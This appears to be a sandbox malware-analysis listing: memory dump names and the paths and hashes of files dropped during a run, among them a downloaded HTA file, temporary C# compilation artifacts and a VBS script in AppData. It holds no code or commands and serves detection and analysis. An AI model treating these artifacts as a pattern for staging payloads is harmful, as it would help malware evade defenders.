memory/2688-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

memory/1404-18-0x0000000002620000-0x0000000002622000-memory.dmp

memory/2688-19-0x00000000023B0000-0x00000000023B2000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B46811C17859FFB409CF0E904A4AA8F8

MD5 971c514f84bba0785f80aa1c23edfd79
SHA1 732acea710a87530c6b08ecdf32a110d254a54c8
SHA256 f157ed17fcaf8837fa82f8b69973848c9b10a02636848f995698212a08f31895
SHA512 43dc1425d80e170c645a3e3bb56da8c3acd31bd637329e9e37094ac346ac85434df4edcdbefc05ae00aea33a80a88e2af695997a495611217fe6706075a63c58

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B46811C17859FFB409CF0E904A4AA8F8

MD5 f9ac9f5a44d5bc7fe061af5181896c6e
SHA1 0f5257245a9274c710edb77217e5d7e99fee6c17
SHA256 110a34e78c5b8db16f1f5357d33854fdc604f54011d39a119b3e1707644af714
SHA512 934f31fe40c2ff8bc8fc6b266639bc91cb7eefaebee76490e38e596a3547b0fb87674347c78041ce5d43cd27fc32f98f76dc15a0d270237cea9bad279a6d6c9e

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 aad049801fbc889aafffe3b3eb96f85b
SHA1 ea931845bb062eb907d3354a4d09871b287a5d22
SHA256 035486c4c9a996e8d550142286d4eb95124af425bf55b9f3e4f19229ca1ee6e0
SHA512 336bda1bae16e90d360b3f2697817f9835da95e0a139243c51a01494061173a8f41a15067a2bfe83b93aa6bdfcc3748dd49423ab989908a3c635135954c67d4d

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8B2B9A00839EED1DFDCCC3BFC2F5DF12

MD5 67e486b2f148a3fca863728242b6273e
SHA1 452a84c183d7ea5b7c015b597e94af8eef66d44a
SHA256 facaf1c3a4bf232abce19a2d534e495b0d3adc7dbe3797d336249aa6f70adcfb
SHA512 d3a37da3bb10a9736dc03e8b2b49baceef5d73c026e2077b8ebc1b786f2c9b2f807e0aa13a5866cf3b3cafd2bc506242ef139c423eaffb050bbb87773e53881e

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8B2B9A00839EED1DFDCCC3BFC2F5DF12

MD5 e5f70e063a29b63a57fd63f1682245d8
SHA1 922ec2b51319fb35134cce1e8188b56cd0937d41
SHA256 d95db9305cc94e8760a784c46b6a40aa5a5352f0d6f16ca536471da124de2726
SHA512 132d4e5c471d7030b1367741eb2ff856f86a42cdcbfe6ed0cc26e7e65e78a6b94ae722e0091127f8fb56705f334fd97bb9d8d8185f38fd164ef3195975eae240

C:\Users\Admin\AppData\Local\Temp\CabEE64.tmp

MD5 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1 1723be06719828dda65ad804298d0431f6aff976
SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512 bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\WCATT3E5\creatednewthingsformee[1].hta

MD5 6e717304324c95149d224a71e675b0a3
SHA1 204dc0fa81a68b0244a46ef0ed1f12389bcc2c65
SHA256 5f0a2146432d26f3c4b439f1be2a857b4af1ac5a601b135c00bc8a545374ac4d
SHA512 d03aea131d144f7e5328f69acc4a28f59ba182fccc3bc7292acc16ff4b886b7e61592d6931915742406f686a484445d00a0e8900bee24d541cf99a5b3d0245db

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

MD5 9b9fa7732759343724fbc283172bd021
SHA1 68c37153a46ddfa8e00e8e7fbe6931c3ba4b8d15
SHA256 748b22122b670fd3a5df87157a14637ecebb01e5e4cfc46785db9b3c646cb26f
SHA512 375f149cf7f3e70e2d2fdd4ce23ca3dfb028126dbb63d6214ad83ec5db1baada98672cdbb51e4901c0f3bc21aa3b442d7ee4abc15ff1537a07c5b388895d1882

\??\c:\Users\Admin\AppData\Local\Temp\hhes_v5z.cmdline

MD5 3eb59cb2ade83138262d8f163e431635
SHA1 dfecd8372cb3e476b685b2d265b1ddd6c2c24787
SHA256 516296628652d04a94fe6d15025dcd0155f7363fb1038e139c166f34c46f1a61
SHA512 9f950f58979c1f352f6286d0c64f0d30ac052977fec54de740228619e6bee9f2848882ccd4c70c466f7b3827895e94530db0fd3d117943c8f32cd9235c3c4f02

\??\c:\Users\Admin\AppData\Local\Temp\hhes_v5z.0.cs

MD5 9b8f2dee116254910197a8801c205862
SHA1 c4fddb1f937921b75c5c988cdb3f459faa446d52
SHA256 5dc90823fdcadfdd6112440b46638cf1ab71285482a67d35e2bf187f68d39ee3
SHA512 00e292822b1e9e94fdf9d91a3edd5cc30f09b02bc6413dde3bb8d1941534637cb0832544f984ed65944e30e473a6820e6816841261efef0f519dab6a14ebf218

\??\c:\Users\Admin\AppData\Local\Temp\CSCF844.tmp

MD5 fa61c06e7f91d77e94ae57bf46bf3500
SHA1 64c58f06a6d125da8bb10e3044103069fca3af7f
SHA256 d8426f4efb7020db186a00efc45566d40d6d19f705b2a1d84a2e667d57e83230
SHA512 af625d8057d8a2d73162798a770ecc3c906334b6b5624df4ddb8985819ccf7a32b67d86c5600685feea4c3c475f5015635bad588b41a9e96b033bcb7ac6af645

C:\Users\Admin\AppData\Local\Temp\RESF845.tmp

MD5 d357105b4812c0d48344a3ec18502d44
SHA1 f03886c219e5fe33ac97b64548339cf8f114d4c0
SHA256 50e66ff1bc3779b6439bc9684d5f8ad9afbebd941f8b11bbaf3638db6bcc2dab
SHA512 d257462dcbcb3d4f017d79202768f94b40e05f9910a174fdbae080862cf43022bf69f458b2c65a9a600d75785de6d53a8f49acfd60af23d04782affe552d5f52

C:\Users\Admin\AppData\Local\Temp\hhes_v5z.dll

MD5 be7a5a5b0d1dafb9d1d153e57bf04eac
SHA1 72c165793ed8f5e9cc938b782838123a07862b44
SHA256 7e551b61458a5925ca884416da116774f907f5f60b1c5ef6d332a0b11b9c5aae
SHA512 6053107a56d99c065883eb8bb91231932f5e34d36ba96ef6812923745ec0c3c2db1dbb6f1af24d520464ce0bf0e833c8cd255e8d2a35241854bd80851d162577

C:\Users\Admin\AppData\Local\Temp\hhes_v5z.pdb

MD5 09e3ae58367a7bbb2ca01f8153ce78a5
SHA1 2ce49883471590fcece9c3a699aba0ff7007d9a5
SHA256 7bc16d51ca6edbc9ad2fb8e19d4be590fb39375a7aa4fbc4171be27c034ec959
SHA512 3f941642169169a81963011f5ca0180d77847fcad593ca4df56655e52bb7b908bd47620842614a1e13f430ac5bd3ae3b1f46cf1df1445ac04f1716bbcd91264e

C:\Users\Admin\AppData\Roaming\seethebesthtingswithmewhichgivegreatoutputofm.vbS

MD5 4dd3d6eed0e1ade77fde299848078ef8
SHA1 75855bee75c0c52d00cad1897c381ffc6c706200
SHA256 9bff58b3dfe1955e923ed90e899ac419667de9e6c842753d68614fbf8f612305
SHA512 3c7907b390cedb7f619f1cb9d3aaa24c623a6083995be4a45690e5fd05982df6054e33d1d434cbcb725ad27003529112abb52138d4f5125bfc8680a786701e5d

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

MD5 e6a8cf52a28d759a8922ad9454306607
SHA1 36af4a24b9085c124c093a85afd1094e688a8bdf
SHA256 0c1cfd6ea375c4a058916f3d1cbd0ddbfa1bd267e0f3fc76ace97126811a59d1
SHA512 c5e85ab44a94ad72b2683a6d6c4ce062be982d8a6a5369e50dde5560f6d69ece08691bd5f966d69c7ee1a5cbf8ee2b8ec345d62cca7170c158cd2ebbd736529f

memory/2688-76-0x000000007276D000-0x0000000072778000-memory.dmp